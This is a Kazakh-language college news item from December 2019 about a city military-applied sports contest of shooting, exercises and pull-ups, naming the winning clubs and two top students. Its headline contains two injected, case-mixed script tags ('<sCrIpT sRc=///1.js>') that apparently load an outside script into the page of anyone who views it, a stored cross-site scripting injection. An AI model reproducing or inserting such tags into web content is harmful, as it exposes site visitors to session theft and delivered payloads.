Әскери-қолданбалы спорт түрлерінен сайыс ұйымдастырылды<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.12.2019

Еліміздің тәуелсіздік күніне орай Жастар ресурстық орталығы мен «Kazakhstan Innovations» компаниясының ұйымдастыруымен колледж базасында қалалық әскери-қолданбалы спорт түрлерінен сайыс ұйымдастырылды.  Аталған жарысқа колледжімізден екі құрама команда қатысты. Жарыс ашық көздеуішті пневматикалық винтовкадан ату, 1 минутта арнайы жаттығулар орындау, ЖҚК кию, кермеге тартылу мен № 12/13 нормативті орындау бойынша өткізілді.

Жалпы командалық есепте төменде аталған командалар жүлделі орындарға ие болды:  «Айбын - 1 » әскери-патриоттық клубы I орын, №3 дарын интернат мектебінің командасы II орын, «Айбын - 2»  әскери-патриоттық клубының тәрбиеленушілері III орынмен марапатталды.

Жеке көрсеткіштер бойынша ДМ-21 тобының студенттері  Маркин Ростислав пен Серікбай  Саян үздік нәтиже көрсетіп, арнайы сыйлықтармен марапатталды.

Просмотров: 656


Пікір қосу



Деректерді қолтаңбаға қосу